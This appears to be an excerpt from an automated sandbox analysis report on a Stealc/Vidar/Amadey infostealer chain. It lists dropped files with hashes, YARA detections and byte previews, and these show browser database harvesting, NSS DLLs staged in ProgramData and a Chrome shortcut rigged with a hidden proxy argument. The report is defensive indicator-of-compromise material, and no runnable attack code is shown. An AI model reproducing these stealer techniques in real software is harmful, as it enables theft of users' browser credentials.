	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Clipboard Hijacker, PureLog Stealer, Stealc, Vidar	Browse
C:\ProgramData\mozglue.dll	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, PureLog Stealer, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Clipboard Hijacker, PureLog Stealer, Stealc, Vidar	Browse

Created / dropped Files

C:\ProgramData\AEHIDAKECFIEBGDHJEBKKKKJKK

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.03859996294213402
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
MD5:	D2A38A463B7925FE3ABE31ECCCE66ACA
SHA1:	A1824888F9E086439B287DEA497F660F3AA4B397
SHA-256:	474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
SHA-512:	62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BGIJJKKJ

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BKKFCFBKFCFBFIDGCGDHJDBKFH

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CBGCAFIIECBFIDHIJKFB

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	ASCII text, with very long lines (1743), with CRLF line terminators
Category:	dropped
Size (bytes):	9504
Entropy (8bit):	5.512408163813622
Encrypted:	false
SSDEEP:	192:nnPOeRnWYbBp6RJ0aX+H6SEXKxkHWNBw8D4Sl:PeegJUaJHEw90
MD5:	1191AEB8EAFD5B2D5C29DF9B62C45278
SHA1:	584A8B78810AEE6008839EF3F1AC21FD5435B990
SHA-256:	0BF10710C381F5FCF42F9006D252E6CAFD2F18840865804EA93DAA06658F409A
SHA-512:	86FF4292BF8B6433703E4E650B6A4BF12BC203EF4BBBB2BC0EEEA8A3E6CC1967ABF486EEDCE80704D1023C15487CC34B6B319421D73E033D950DBB1724ABADD5
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "9e34c6e7-cbed-40a0-ba63-35488e171013");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696426836);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696426837);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\CFHDBFIEGIDGIECBKJEC

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HCAEHJJKFCAAFHJKFBKKEBKECB

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8439810553697228
Encrypted:	false
SSDEEP:	24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
MD5:	9D46F142BBCF25D0D495FF1F3A7609D3
SHA1:	629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
SHA-256:	C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
SHA-512:	AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IECBAFCAAKJDHJKFIEBGDHJDHD

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IIJDBAKK

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KECBKKEBKEBFCAAAEGDH

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\Public\Desktop\Google Chrome.lnk

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:41 2023, mtime=Wed Oct 4 13:17:01 2023, atime=Wed Sep 27 04:28:27 2023, length=3242272, window=hide
Category:	dropped
Size (bytes):	2104
Entropy (8bit):	3.4536835685480676
Encrypted:	false
SSDEEP:	48:8S5l2dfTXd2RYrnvPdAKRkdAGdAKRFdAKRE:8S5lOp
MD5:	2BE6491C56D796445F2256E1509E1337
SHA1:	81B2025E3DB726D02F2D90632A8BC97628CB1433
SHA-256:	5C0F60FB8624B62266DA8DC3562644AF7B7A377CFD7371462222E4C318FE738D
SHA-512:	6E78B2169EE960E4DD499F59B5F8D7AB05673EE09AC72705AE89C57EAC1B2AB89CA49BED24E9DA2186DC7F2B3A184D153BFE4298C9CEE430096B1800DCAE30D2
Malicious:	false
Preview:	L..................F.@.. ......,.....B1q.......q.... y1.....................#....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IDW.r....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VDWUl....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VDWUl....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VDWUl..........................."&.A.p.p.l.i.c.a.t.i.o.n.....`.2. y1.;W.+ .chrome.exe..F......CW.VDW.r..........................,.6.c.h.r.o.m.e...e.x.e.......d...............-.......c............F.......C:\Program Files\Google\Chrome\Application\chrome.exe....A.c.c.e.s.s. .t.h.e. .I.n.t.e.r.n.e.t.;.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.!.-.-.p.r.o.x.y.-.s.e.r.v.e.r

C:\Users\user\1000238002\Amadeus.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	435200
Entropy (8bit):	6.5238833830985
Encrypted:	false
SSDEEP:	6144:31YnIct+B6NxMYE4+Sx9SY5pkUM7LOM/9HtlcyKZrr02e7wufA5oVt1ZuWu1KBF/:0IGxJECSYCLTxKZn1e7C5oVnZuWu3p
MD5:	CED97D60021D4A0BFA03EE14EC384C12
SHA1:	7AF327DF2A2D1E0E09034C2BDF6A47F788CEC4E4
SHA-256:	9E06EED4E1237FFDC84F0FF666FBE4B39E1BD2C60BD542870F7E1BFB10555951
SHA-512:	AF0A02DAA759010A1EDFC78F14C5FE321C10802D0B9DF55B515FE501114AF0835A05BBD5DD5E2167B4B1F39BB6DA787343BF9141D5F811113F71749741B47811
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\1000238002\Amadeus.exe, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L......f..................................... ....@.......................................@.................................\|#...................................M......8...................\|..........@............ ..$............................text............................... ..`.rdata....... ......................@..@.data...\|f...@...4... ..............@....rsrc................T..............@..@.reloc...M.......N...V..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\6rxotqIg7H.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\6rxotqIg7H.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3274
Entropy (8bit):	5.3318368586986695
Encrypted:	false
SSDEEP:	96:Pq5qHwCYqh3oPtI6eqzxP0aymRLKTqdqlq7qqjqcEZ5D:Pq5qHwCYqh3qtI6eqzxP0at9KTqdqlqY
MD5:	0B2E58EF6402AD69025B36C36D16B67F
SHA1:	5ECC642327EF5E6A54B7918A4BD7B46A512BF926
SHA-256:	4B0FB8EECEAD6C835CED9E06F47D9021C2BCDB196F2D60A96FEE09391752C2D7
SHA-512:	1464106CEC5E264F8CEA7B7FF03C887DA5192A976FBC9369FC60A480A7B9DB0ED1956EFCE6FFAD2E40A790BD51FD27BB037256964BC7B4B2DA6D4D5C6B267FA1
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.log

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3274
Entropy (8bit):	5.3318368586986695
Encrypted:	false
SSDEEP:	96:Pq5qHwCYqh3oPtI6eqzxP0aymRLKTqdqlq7qqjqc85VD:Pq5qHwCYqh3qtI6eqzxP0at9KTqdqlq0
MD5:	0C1110E9B7BBBCB651A0B7568D796468
SHA1:	7AEE00407EE27655FFF0ADFBC96CF7FAD9610AAA
SHA-256:	112E21404A85963FB5DF8388F97429D6A46E9D4663435CC86267C563C0951FA2
SHA-512:	46E37552764B4E61006AB99F8C542D55B2418668B097D3C6647D306604C3D7CA3FAF34F8B4121D94B0E7168295B2ABEB7C21C3B96F37208943537B887BC81590
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\crypted.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	42
Entropy (8bit):	4.0050635535766075
Encrypted:	false
SSDEEP:	3:QHXMKa/xwwUy:Q3La/xwQ
MD5:	84CFDB4B995B1DBF543B26B86C863ADC
SHA1:	D2F47764908BF30036CF8248B9FF5541E2711FA2
SHA-256:	D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
SHA-512:	485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\crypteda.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	42
Entropy (8bit):	4.0050635535766075
